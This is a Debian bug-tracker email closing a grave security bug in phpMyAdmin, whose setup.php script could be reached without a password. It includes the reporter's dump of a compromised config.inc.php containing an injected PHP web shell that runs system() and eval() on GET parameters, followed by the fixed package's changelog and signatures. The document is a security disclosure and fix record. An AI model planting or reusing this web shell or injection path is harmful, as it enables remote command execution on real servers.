Your message dated Sun, 25 Oct 2009 19:57:41 +0000
with message-id <[email protected]>
and subject line Bug#543460: fixed in phpmyadmin 4:2.11.8.1-5+lenny3
has caused the Debian Bug report #543460,
regarding phpmyadmin: No password protection for setup.php script
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.9.1.1-11
Severity: grave
Tags: security
Justification: user security hole
After install, you can access http://{host}/phpmyadmin/scripts/setup.php
without entering any password.
By adding a new host in the configuration, an attacker can submit malicius code
to execute commands as
www-data user.
This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack:
/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
-- System Information:
Debian Release: 4.0
APT prefers oldstable
APT policy: (500, 'oldstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8)
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy
ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti
ii perl 5.8.8-7etch6 Larry Wall's Practical Extraction
ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5
ii ucf 2.0020 Update Configuration File: preserv
Versions of packages phpmyadmin recommends:
ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD
pn php5-gd | php4-gd <none> (no description available)
pn php5-mcrypt | php4-mcrypt <none> (no description available)
-- debconf information:
phpmyadmin/setup-username: admin
phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:2.11.8.1-5+lenny3
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz
phpmyadmin_2.11.8.1-5+lenny3.dsc
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc
phpmyadmin_2.11.8.1-5+lenny3_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thijs Kinkhorst <[email protected]> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Sun, 25 Oct 2009 12:30:40 +0100
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:2.11.8.1-5+lenny3
Distribution: stable-security
Urgency: high
Maintainer: Thijs Kinkhorst <[email protected]>
Changed-By: Thijs Kinkhorst <[email protected]>
Description:
phpmyadmin - MySQL web administration tool
Closes: 535044 543460 552194
Changes:
phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low
.
* Correct some documentation issues of new script.
.
phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high
.
* Upload to stable to fix security issues.
* Fixes XSS and SQL injection (Closes: #552194).
[PMASA-2009-6, CVE-2009-3696, CVE-2009-3697]
* Allow saving of configuration from setup script only after explicit action
from administrator (Closes: #535044, #543460).
Checksums-Sha1:
104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc
e73e24d04b0c73386de7ae4e112227d17eae7d98 63773
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
c90b5b5168330a0a8e4eeba1c0aea405e7e1a472 2883628
phpmyadmin_2.11.8.1-5+lenny3_all.deb
Checksums-Sha256:
7d53fc216fd8b99ea440b72870ff018527b189cce5242618e4baeb2853123ff2 1547
phpmyadmin_2.11.8.1-5+lenny3.dsc
e5fc26908652779a12d91652ac2c270c583b1922a338139b9a231cee910911bd 63773
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
ae37df4ffc3f6f8c1365d589edd8a255a37ddc1d97b0e9ea0752db72d3a9d7d3 2883628
phpmyadmin_2.11.8.1-5+lenny3_all.deb
Files:
db7c29dbd8ad5758ea8283ebbde9c611 1547 web extra
phpmyadmin_2.11.8.1-5+lenny3.dsc
a3c38a698e954534517a81570e9fc9fa 63773 web extra
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
da6a70575f8ae6608910a1c5aaf81f1c 2883628 web extra
phpmyadmin_2.11.8.1-5+lenny3_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iQEcBAEBAgAGBQJK5DiKAAoJECIIoQCMVaAcUOsH/iW+RHo9EJjjiuBmz6/T/quz
TxeSQiporVxM2ibMcdU8Xa5KecrQxwkAU5gtzdusoe6Xe+Tr8twgch2T1pl/mqmO
vIpZrLrnwsr+Pb5ofH1jpB5FcIc//GcJ81gQ9y7Vf54Dj2j1tZ1iVc+ViWrIhRBC
1bLKP4UXs6MnC2QHa6agIoOliwuD1FJMRtn4RRe9emV6ReBXno3x0MvJULlxE0C7
aVdN9pd05bf8NQfl9Gk+QqimQqNuQZE/PNdSl+XuzIaY0BBBvZEYq7J3VgEsINNU
Mze8qQKSdXEbNcDbF/LyfRwNo1LYcygg06P0lRI8chML8To7yHHq7BuGFmFToNA=
=fYxY
-----END PGP SIGNATURE-----
--- End Message ---
